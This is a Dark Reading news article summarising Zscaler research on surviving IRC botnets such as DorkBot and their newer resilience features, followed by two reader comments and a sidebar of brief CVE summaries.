Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Vulnerabilities / Threats

05:01 PM
Connect Directly

IRC Botnets Are Not Quite Dead Yet

The handful that still operate are more sophisticated and resilient than before, Zscaler says.

Far from going the way of the dodo as many had surmised, Internet Relay Chat (IRC) botnets are alive and thriving.

A new study by security vendor Zscaler shows that IRC botnets, while not growing at a particularly rapid rate, continue to be active and have incorporated several new features over the years that make them as a potent a threat as ever.

The focus of Zscaler’s analysis was on four new IRC botnet families that hit the company’s cloud sandboxes worldwide in 2015. The company identified the four botnets as DorkBot, IRCBot.HI, RageBot and Phorpiex. Of this, the most prevalent IRC botnet is DorkBot, according to the company.

Though the payloads from such botnets represented only a very small proportion of the new payloads for all known botnet families, they still represented a threat, said Zscaler researcher director Deepen Desai. The top five locations currently getting hit by IRC botnet payloads include the USA, Germany and India.

“In this era of sophisticated botnets with multiple C&C communication channels, custom protocols, and encrypted communication, we continue to see a steady number of new IRC based botnet payloads being pushed out into the wild [regularly],” he said in an emailed comment to Dark Reading.

IRC botnets were especially prevalent in the 1990s and early to mid 2000’s but have been gradually dwindling in numbers since then. Such botnets basically are comprised of a collection of infected systems that are controlled remotely via a preconfigured IRC server and channel. While such botnets can be effective, they are also susceptible to a single point of failure if someone were to take down the IRC server or channel of block IRC communications, he said.

Back in 2007, when there were still thousands of IRC botnets operating in the world, researchers found that most had a life span of just two months because of how easy they were to take down. That’s the reason why cybercriminals have moved to different web-based C&C communication channels over the years, he said. But what Zscaler’s analysis showed is that IRC botnets have evolved as well, Desai said.

While the core C&C communication protocol that is used remains IRC, several new features have been added that make them comparable to some of the more sophisticated web-based botnets out there, he said. For example, IRC botnet operators these days use multiple servers and channels for command and control purposes, so they no longer have a single point of failure like before.

Many use encryption to protect all IRC communication between an infected host and C&C server. New payloads, including new C&C information, are downloaded periodically from preconfigured URLS to infected systems and many use anti-analysis techniques to deter automated sandboxing, Desai said.

The enhancements don’t stop there. IRC botnets use the same kind of propagation methods that other botnets do including file injection, P2P applications, instant messaging, and via compromised removable drives. IRC botnets are also used for many of the same applications including for launching denial of service attacks, for installing or uninstalling other malware payloads for a fee and for stealing user credentials and other sensitive information.

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year ... View Full Bio

Comment  | 
Print  | 
More Insights
Oldest First  |  Newest First  |  Threaded View
Joe Stanganelli
Joe Stanganelli,
User Rank: Ninja
4/29/2015 | 11:53:40 PM
Of course, not a lot of people think about IRC anymore...except the techies, hackers, and people active in certain communities (like reddit and 4chan).  Thanks for this important reminder that, as IRC still proliferates, so too do IRC vulnerabilities.
User Rank: Ninja
4/30/2015 | 5:33:13 PM
IRC Bot or Clever Geek?
The most dangerous of the IRC bots are those that have been in place for years and as far as anyone knows are some clever geek (or jerk) haunting the IRC channels.

I recall being on an OpenVMS channel for a long time and exchanging some words with a guy who I thought just had bad English. I should talk since I use Google Translate constantly to talk to people who must cringe when they seem my messages fly by :-)

Long story short, turns out the geek was a bot; I was less careful back then and could basically have been owned by whomever placed the IRC bot there since I was completely convinced it was a person.

While I tend to stick to Freenode these days, I used to connect to dozens of servers, hundreds of channels. IRC is alive and well, but as noted by Joe here, lots of people don't really think about IRC anymore (like BBS) and in a way, neither do we - the regular users - since it's about as comfortable as a desk phone and the feeling of picking up the receiver after hearing a ring.

Yeah, we need to get less comfortable and more alert, for both our sake and that of our fellow IRCers.
COVID-19: Latest Security News & Commentary
Dark Reading Staff 4/10/2020
Zscaler to Buy Cloudneeti
Dark Reading Staff 4/9/2020
The Coronavirus & Cybersecurity: 3 Areas of Exploitation
Robert R. Ackerman Jr., Founder & Managing Director, Allegis Capital,  4/7/2020
Register for Dark Reading Newsletters
White Papers
Cartoon Contest
Write a Caption, Win a Starbucks Card! Click Here
Latest Comment: Yes, I do have virus protection on my system, now what?
Current Issue
6 Emerging Cyber Threats That Enterprises Face in 2020
This Tech Digest gives an in-depth look at six emerging cyber threats that enterprises could face in 2020. Download your copy today!
Flash Poll
State of Cybersecurity Incident Response
State of Cybersecurity Incident Response
Data breaches and regulations have forced organizations to pay closer attention to the security incident response function. However, security leaders may be overestimating their ability to detect and respond to security incidents. Read this report to find out more.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
PUBLISHED: 2020-04-10
An issue was discovered in the Linux kernel before 5.2 on the powerpc platform. arch/powerpc/kernel/idle_book3s.S does not have save/restore functionality for PNV_POWERSAVE_AMR, PNV_POWERSAVE_UAMOR, and PNV_POWERSAVE_AMOR, aka CID-53a712bae5dd.
PUBLISHED: 2020-04-10
There is an improper authentication vulnerability in several smartphones. Certain function interface in the system does not sufficiently validate the caller's identity in certain share scenario, successful exploit could cause information disclosure. Affected product versions include:Mate 30 Pro vers...
PUBLISHED: 2020-04-10
Under certain conditions, vmdir that ships with VMware vCenter Server, as part of an embedded or external Platform Services Controller (PSC), does not correctly implement access controls.
PUBLISHED: 2020-04-10
IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 traditional is vulnerable to a privilege escalation vulnerability when using token-based authentication in an admin request over the SOAP connector. IBM X-Force ID: 178929.
PUBLISHED: 2020-04-10
There is an insufficient integrity validation vulnerability in several products. The device does not sufficiently validate the integrity of certain file in certain loading processes, successful exploit could allow the attacker to load a crafted file to the device through USB.Affected product version...